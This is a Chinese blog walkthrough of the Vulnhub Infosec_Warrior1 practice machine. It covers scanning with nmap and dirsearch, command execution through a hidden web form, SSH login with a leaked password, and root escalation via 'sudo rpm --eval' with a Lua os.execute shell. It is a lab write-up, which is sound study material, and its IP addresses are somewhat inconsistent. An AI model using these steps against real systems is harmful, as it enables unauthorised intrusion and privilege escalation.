Vulnhub靶机Infosec_Warrior1渗透

已于 2023-09-22 09:03:03 修改
阅读量214 收藏
点赞数 6
分类专栏: vulnhub靶机 文章标签: 网络安全 安全 运维
于 2023-09-13 20:32:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45953122/article/details/132864180
版权

信息收集

主机发现

arp-scan -l

image-20230913165556516

端口扫描

nmap -A -p- 192.168.160.39

image-20230913165726170

目录爆破

dirsearch -u http://192.168.160.39

命令解释:

  • dirsearch:是运行的工具的名称。

  • -u http://192.168.60.39:指定要执行目录枚举的目标 URL。确保包含http://前缀。

  • -i 200:此选项指示dirsearch仅显示返回 HTTP 状态代码 的目录200,这通常表示该目录存在并且可以访问。

    • 补充: -e php,html:此选项指定在目录枚举期间要查找的文件扩展名。

image-20230913170237511

访问80端口,只能看出是Apache站点,没有别的

image-20230913170406481

访问一下sitemap.xml

image-20230913170446491

访问192.168.80.145/index.htnl,也没啥有用的,只有一张gif格式的动态图

在这里插入图片描述

查看页面源代码,发现隐藏的一个form表单,可以删除hidden='True',回车!

image-20230913170954104

因为靶机是在Centos系统上,所以在输入框中输入ls,没有得到正常的回显

image-20230913171148130

from表单换成post请求

image-20230913171308002

再次在 输入框中输入ls,成功有了 回显

image-20230913171343477

查看cmd.php,在表单中输入cat cmd.php

image-20230913172229355

使用ssh远程连接 ssh isw0@192.168.160.39 密码:123456789blabla

如果ssh isw0@192.168.80.145连接时回应的是:Unable to negotiate with 192.168.160.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ,可以使用:

ssh -oHostKeyAlgorithms=+ssh-rsa isw0@192.168.160.39

命令解析:

ssh: SSH命令,用于远程登录到其他计算机。
-o: 选项参数的前缀,用于指定一些特定的配置选项。
HostKeyAlgorithms=+ssh-rsa: 这是一个指定主机密钥算法的配置选项。+ssh-rsa表示允许使用RSA算法进行主机认证。主机密钥是用于验证远程主机身份的一种机制。
isw0@192.168.188.191: 用户名和目标主机的IP地址。isw0是用户名。

image-20230913200958977

提权

连接成功后,sudo -l查看有哪些能以root身份执行的命令

image-20230913201042940

去这个网站上找提权命令:https://gtfobins.github.io/

只能找到rpm命令字的提权方式

image-20230913201328690

输入命令:

sudo rpm --eval '%{lua:os.execute("/bin/sh")}'

提权成功:

image-20230913201551023

Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub系列靶机-Infosec_Warrior1
来日可期的博客
09-21 1254
获取了用户名和密码信息后,之前在端口扫描的时候探测出了22端口,尝试ssh连接。由于靶机是在Centos系统上,所以在输入框中输入ls,没有得到正常的回显。之前的表单是GET方式提交的,尝试将from表单替换成post请求方式。查看页面源代码,发现一个隐藏的form表单,让其显示出来。连接成功,但是当前用户的权限较低,进行提权。,有一张gif格式的动态图(蛮搞笑的)。,发现后端接受的数据就是POST方式。发现22端口和80端口是开发的。这样页面上就多了一个提交的输入框。查找rpm命令字的提权方式。
Vulnhub靶机Infosec_Warrior1
过期的秋刀鱼
08-20 341
难易程度: Easy。
靶机渗透-InfoSecWarriorBox2
qq_43235703的博客
02-02 1236
靶机渗透-InfoSecWarriorBox2 信息收集 nmap开路 nmap -sS -p1-65535 192.168.1.102 dirb扫描 访问56563端口 初步判断网站是使用python来写的,我们可以使用nc来反弹到shell来执行内容 提示我们输入数字,那随意输入一个数字看看回显 输入了2,执行了ping命令,ping自己,ping的次数为我们输入的数字 试想后台执行的命令为: ping -c {} 127.0.0.1 Geshell 中括号里面为我们输入的数字次数,所以才会执行两次
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub:infovore靶机
qq_43884092的博客
01-19 184
使用wfuzz测试index.php发现存在文件包含,文件包含配合phpinfo反弹shell,使用john爆破root密码
Vulhub InfoSecWarrior1
hee_mee的博客
04-27 284
Nilzero
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8556
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
web应用安全和信息泄露预防
最新发布
weixin_43930865的博客
11-18 480
使用springboot开发的应用可能存在各种使用不当导致的信息泄露和漏洞,在此记录。
等保二级需要哪些安全设备?
bocco的博客
11-15 611
同时,还应加强安全管理措施的实施,提高员工的安全意识和能力,共同维护企业的信息安全。这些设备能够实时监测机房内的温湿度、漏水情况,一旦超出预设范围,便会自动报警,及时采取措施,确保服务器在适宜的环境中稳定运行。1. 防火墙:防火墙是网络安全的第一道屏障,能够控制进出网络的数据包,防止未经授权的访问和恶意攻击。在等保二级中,应部署下一代防火墙,其不仅具备传统防火墙的功能,还集成了入侵防御、防病毒等功能,能够更有效地保护服务器的安全。通过部署日志审计系统,可以及时发现并处理网络中的异常行为,提高网络的安全性。
JWT深度解析:Java Web中的安全传输与身份验证
2401_85760095的博客
11-14 664
JSON Web Token(JWT)是一种轻量级的身份验证和授权标准,它允许在各方之间安全地传输信息。JWT作为一种安全传输信息和身份验证的解决方案,在Java Web开发中扮演着重要角色。它通过紧凑、自包含的方式传输用户信息,同时支持无状态和跨域认证,使得JWT成为现代Web应用中不可或缺的一部分。JWT是一种紧凑的、URL安全的令牌,用于在各方之间安全地传输信息。JWT的结构允许其轻松地在不同的系统之间传输,并且能被携带在URL的参数中,同时也支持在POST请求体中作为表单数据发送。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 894
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
CertiK安全调研报告:Web3.0桌面钱包的初步安全评估
weixin_58310340的博客
11-15 662
本报告呈现了对多个桌面钱包的分析和结论,旨在提升所有Web3.0成员的安全意识。我们期望通过这份报告,提醒用户在使用桌面钱包时保持高度警觉,保护自己的数字资产。
网络安全:我们的安全防线
介绍多个领域的专业技术知识传播,包括开发、运维、网络加速、网络代理、软路由等,有兴趣可以加V一起交流。V:fastman2024,备注:CSDN
11-18 456
个人、企业和国家都应加强对网络安全的重视,采取有效措施,共同构建一个安全、稳定、繁荣的网络空间。只有不断提高网络安全意识,加强网络安全防护,才能有效应对网络威胁,保护我们的数字世界。企业在网络安全方面的疏忽可能导致商业机密泄露,影响企业的竞争力。例如,2013年发生的“斯诺登事件”揭露了美国政府对全球通信的监控行为,这一事件不仅引发了全球范围内的隐私保护讨论,也对国际关系产生了深远影响。
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值